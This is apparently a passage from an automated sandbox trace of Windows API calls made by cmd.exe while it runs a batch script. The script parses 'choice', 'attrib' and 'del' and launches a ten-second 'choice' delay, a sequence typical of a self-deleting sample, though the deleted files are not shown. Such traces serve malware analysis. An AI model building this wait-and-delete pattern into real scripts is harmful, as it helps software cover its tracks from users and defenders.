_String2="RANDOM") returned -7 [0083.058] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0083.058] GetProcessHeap () returned 0x410000 [0083.058] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x421db0 [0083.059] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f738 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0083.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x32f738, lpFilePart=0x32f734 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x32f734*="system32") returned 0x13 [0083.059] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0083.059] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x32f4b4 | out: lpFindFileData=0x32f4b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x4107f0 [0083.059] FindClose (in: hFindFile=0x4107f0 | out: hFindFile=0x4107f0) returned 1 [0083.059] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x32f4b4 | out: lpFindFileData=0x32f4b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x4107f0 [0083.059] FindClose (in: hFindFile=0x4107f0 | out: hFindFile=0x4107f0) returned 1 [0083.059] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0083.059] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0083.060] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0083.060] GetProcessHeap () returned 0x410000 [0083.060] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4249e0 | out: hHeap=0x410000) returned 1 [0083.060] GetEnvironmentStringsW () returned 0x421f30* [0083.060] GetProcessHeap () returned 0x410000 [0083.060] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa5a) returned 0x423fa8 [0083.060] FreeEnvironmentStringsW (penv=0x421f30) returned 1 [0083.060] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a2f5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0083.060] GetProcessHeap () returned 0x410000 [0083.060] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x421db0 | out: hHeap=0x410000) returned 1 [0083.060] GetProcessHeap () returned 0x410000 [0083.060] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400e) returned 0x425e80 [0083.060] GetProcessHeap () returned 0x410000 [0083.060] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xd0) returned 0x411030 [0083.060] GetProcessHeap () returned 0x410000 [0083.060] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425e80 | out: hHeap=0x410000) returned 1 [0083.060] GetConsoleOutputCP () returned 0x1b5 [0083.061] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0083.061] GetUserDefaultLCID () returned 0x409 [0083.061] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a2f4950, cchData=8 | out: lpLCData=":") returned 2 [0083.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32f878, cchData=128 | out: lpLCData="0") returned 2 [0083.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32f878, cchData=128 | out: lpLCData="0") returned 2 [0083.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32f878, cchData=128 | out: lpLCData="1") returned 2 [0083.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a2f4940, cchData=8 | out: lpLCData="/") returned 2 [0083.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a2f4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0083.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a2f4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0083.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a2f4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0083.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a2f4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0083.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a2f4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0083.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a2f4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0083.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a2f4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0083.063] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a2f4930, cchData=8 | out: lpLCData=".") returned 2 [0083.063] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a2f4920, cchData=8 | out: lpLCData=",") returned 2 [0083.063] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0083.070] GetProcessHeap () returned 0x410000 [0083.070] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20c) returned 0x424a10 [0083.070] GetConsoleTitleW (in: lpConsoleTitle=0x424a10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0083.070] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0083.070] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0083.070] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0083.070] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0083.072] GetProcessHeap () returned 0x410000 [0083.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400a) returned 0x425e80 [0083.072] GetProcessHeap () returned 0x410000 [0083.072] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425e80 | out: hHeap=0x410000) returned 1 [0083.072] _wcsicmp (_String1="choice", _String2=")") returned 58 [0083.072] _wcsicmp (_String1="FOR", _String2="choice") returned 3 [0083.072] _wcsicmp (_String1="FOR/?", _String2="choice") returned 3 [0083.072] _wcsicmp (_String1="IF", _String2="choice") returned 6 [0083.072] _wcsicmp (_String1="IF/?", _String2="choice") returned 6 [0083.072] _wcsicmp (_String1="REM", _String2="choice") returned 15 [0083.072] _wcsicmp (_String1="REM/?", _String2="choice") returned 15 [0083.072] GetProcessHeap () returned 0x410000 [0083.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x411108 [0083.072] GetProcessHeap () returned 0x410000 [0083.072] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x16) returned 0x421db0 [0083.073] GetProcessHeap () returned 0x410000 [0083.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x22) returned 0x421dd0 [0083.074] GetProcessHeap () returned 0x410000 [0083.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x411168 [0083.074] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0083.074] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0083.074] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0083.074] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0083.074] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0083.074] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0083.074] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0083.074] GetProcessHeap () returned 0x410000 [0083.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x424c28 [0083.074] GetProcessHeap () returned 0x410000 [0083.074] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x16) returned 0x4111c8 [0083.075] GetProcessHeap () returned 0x410000 [0083.075] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x50) returned 0x424c88 [0083.076] GetProcessHeap () returned 0x410000 [0083.076] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x424ce0 [0083.076] _wcsicmp (_String1="del", _String2=")") returned 59 [0083.076] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0083.076] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0083.076] _wcsicmp (_String1="IF", _String2="del") returned 5 [0083.076] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0083.076] _wcsicmp (_String1="REM", _String2="del") returned 14 [0083.076] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0083.076] GetProcessHeap () returned 0x410000 [0083.076] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x424d40 [0083.076] GetProcessHeap () returned 0x410000 [0083.076] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x41fe18 [0083.077] GetProcessHeap () returned 0x410000 [0083.077] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x48) returned 0x424da0 [0083.078] GetConsoleTitleW (in: lpConsoleTitle=0x32f50c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0083.078] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0083.078] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0083.078] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0083.078] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0083.078] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0083.078] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0083.079] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0083.079] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0083.079] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0083.079] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0083.079] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0083.079] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0083.079] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0083.079] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0083.079] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0083.079] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0083.079] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0083.079] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0083.079] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0083.079] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0083.079] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0083.079] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0083.079] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0083.079] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0083.079] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0083.079] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0083.079] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0083.079] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0083.079] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0083.079] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0083.079] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0083.079] _wcsicmp (_String1="choice", _String2="START") returned -16 [0083.079] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0083.079] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0083.079] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0083.079] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0083.079] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0083.079] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0083.079] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0083.079] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0083.079] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0083.080] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0083.080] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0083.080] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0083.080] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0083.080] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0083.080] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0083.080] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0083.080] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0083.080] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0083.080] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0083.080] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0083.080] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0083.080] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0083.080] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0083.080] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0083.080] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0083.080] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0083.080] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0083.080] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0083.080] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0083.080] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0083.080] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0083.080] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0083.080] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0083.080] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0083.080] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0083.080] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0083.080] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0083.080] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0083.080] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0083.080] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0083.080] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0083.080] _wcsicmp (_String1="choice", _String2="START") returned -16 [0083.080] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0083.080] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0083.081] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0083.081] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0083.081] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0083.081] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0083.081] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0083.081] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0083.081] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0083.081] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0083.081] _wcsicmp (_String1="choice", _String2="FOR") returned -3 [0083.081] _wcsicmp (_String1="choice", _String2="IF") returned -6 [0083.081] _wcsicmp (_String1="choice", _String2="REM") returned -15 [0083.081] GetProcessHeap () returned 0x410000 [0083.081] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x210) returned 0x424df0 [0083.081] GetProcessHeap () returned 0x410000 [0083.081] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x425008 [0083.081] _wcsnicmp (_String1="choi", _String2="cmd ", _MaxCount=0x4) returned -5 [0083.081] GetProcessHeap () returned 0x410000 [0083.081] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x418) returned 0x421f30 [0083.082] SetErrorMode (uMode=0x0) returned 0x1 [0083.082] SetErrorMode (uMode=0x1) returned 0x0 [0083.082] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x421f38, lpFilePart=0x32f02c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x32f02c*="system32") returned 0x13 [0083.082] SetErrorMode (uMode=0x1) returned 0x1 [0083.082] GetProcessHeap () returned 0x410000 [0083.082] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x421f30, Size=0x3e) returned 0x421f30 [0083.082] GetProcessHeap () returned 0x410000 [0083.082] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x421f30) returned 0x3e [0083.082] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;") returned 0x64 [0083.082] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0083.082] GetProcessHeap () returned 0x410000 [0083.082] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xfe) returned 0x425040 [0083.082] GetProcessHeap () returned 0x410000 [0083.082] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1f4) returned 0x425148 [0083.088] GetProcessHeap () returned 0x410000 [0083.088] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x425148, Size=0x100) returned 0x425148 [0083.088] GetProcessHeap () returned 0x410000 [0083.088] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x425148) returned 0x100 [0083.089] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0083.089] GetProcessHeap () returned 0x410000 [0083.089] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe0) returned 0x425250 [0083.089] GetProcessHeap () returned 0x410000 [0083.089] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x425250, Size=0x76) returned 0x425250 [0083.089] GetProcessHeap () returned 0x410000 [0083.089] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x425250) returned 0x76 [0083.101] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0083.102] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x32eda8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eda8) returned 0x4252d0 [0083.102] GetProcessHeap () returned 0x410000 [0083.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4111e8 [0083.102] FindClose (in: hFindFile=0x4252d0 | out: hFindFile=0x4252d0) returned 1 [0083.102] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.COM", fInfoLevelId=0x1, lpFindFileData=0x32eda8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eda8) returned 0xffffffff [0083.102] GetLastError () returned 0x2 [0083.102] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\choice.EXE", fInfoLevelId=0x1, lpFindFileData=0x32eda8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eda8) returned 0x4252d0 [0083.103] GetProcessHeap () returned 0x410000 [0083.103] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4111e8, Size=0x4) returned 0x4111e8 [0083.103] FindClose (in: hFindFile=0x4252d0 | out: hFindFile=0x4252d0) returned 1 [0083.103] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0083.103] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0083.103] GetConsoleTitleW (in: lpConsoleTitle=0x32f2a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0083.103] InitializeProcThreadAttributeList (in: lpAttributeList=0x32f128, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32f1f0 | out: lpAttributeList=0x32f128, lpSize=0x32f1f0) returned 1 [0083.103] UpdateProcThreadAttribute (in: lpAttributeList=0x32f128, dwFlags=0x0, Attribute=0x60001, lpValue=0x32f1e8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32f128, lpPreviousValue=0x0) returned 1 [0083.103] GetStartupInfoW (in: lpStartupInfo=0x32f0e4 | out: lpStartupInfo=0x32f0e4*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0083.103] GetProcessHeap () returned 0x410000 [0083.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x4252d0 [0083.103] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0083.103] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0083.103] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0083.103] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0083.103] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0083.103] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0083.103] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0083.104] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0083.104] GetProcessHeap () returned 0x410000 [0083.104] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4252d0 | out: hHeap=0x410000) returned 1 [0083.104] GetProcessHeap () returned 0x410000 [0083.105] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa) returned 0x41fe30 [0083.105] lstrcmpW (lpString1="\\choice.exe", lpString2="\\XCOPY.EXE") returned -1 [0083.106] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\choice.exe", lpCommandLine="choice /t 10 /d y ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x32f184*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="choice /t 10 /d y ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32f1d0 | out: lpCommandLine="choice /t 10 /d y ", lpProcessInformation=0x32f1d0*(hProcess=0x80, hThread=0x7c, dwProcessId=0x82c, dwThreadId=0x85c)) returned 1 [0083.115] CloseHandle (hObject=0x7c) returned 1 [0083.115] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0083.115] GetProcessHeap () returned 0x410000 [0083.115] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x423fa8 | out: hHeap=0x410000) returned 1 [0083.115] GetEnvironmentStringsW () returned 0x423fa8* [0083.115] GetProcessHeap () returned 0x410000 [0083.115] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa5a) returned 0x4220e8 [0083.115] FreeEnvironmentStringsW (penv=0x423fa8) returned 1 [0083.115] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0094.452] GetExitCodeProcess (in: hProcess=0x80, lpExitCode=0x32f0c4 | out: lpExitCode=0x32f0c4*=0x1) returned 1 [0094.452] CloseHandle (hObject=0x80) returned 1 [0094.452] _vsnwprintf (in: _Buffer=0x32f20c, _BufferCount=0x13, _Format="%08X", _ArgList=0x32f0d0 | out: _Buffer="00000001") returned 8 [0094.452] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0094.452] GetProcessHeap () returned 0x410000 [0094.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4220e8 | out: hHeap=0x410000) returned 1 [0094.452] GetEnvironmentStringsW () returned 0x4220e8* [0094.452] GetProcessHeap () returned 0x410000 [0094.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa80) returned 0x428908 [0094.452] FreeEnvironmentStringsW (penv=0x4220e8) returned 1 [0094.452] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0094.452] GetProcessHeap () returned 0x410000 [0094.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428908 | out: hHeap=0x410000) returned 1 [0094.452] GetEnvironmentStringsW () returned 0x4220e8* [0094.452] GetProcessHeap () returned 0x410000 [0094.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa80) returned 0x428908 [0094.452] FreeEnvironmentStringsW (penv=0x4220e8) returned 1 [0094.452] GetProcessHeap () returned 0x410000 [0094.452] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x41fe30 | out: hHeap=0x410000) returned 1 [0094.452] DeleteProcThreadAttributeList (in: lpAttributeList=0x32f128 | out: 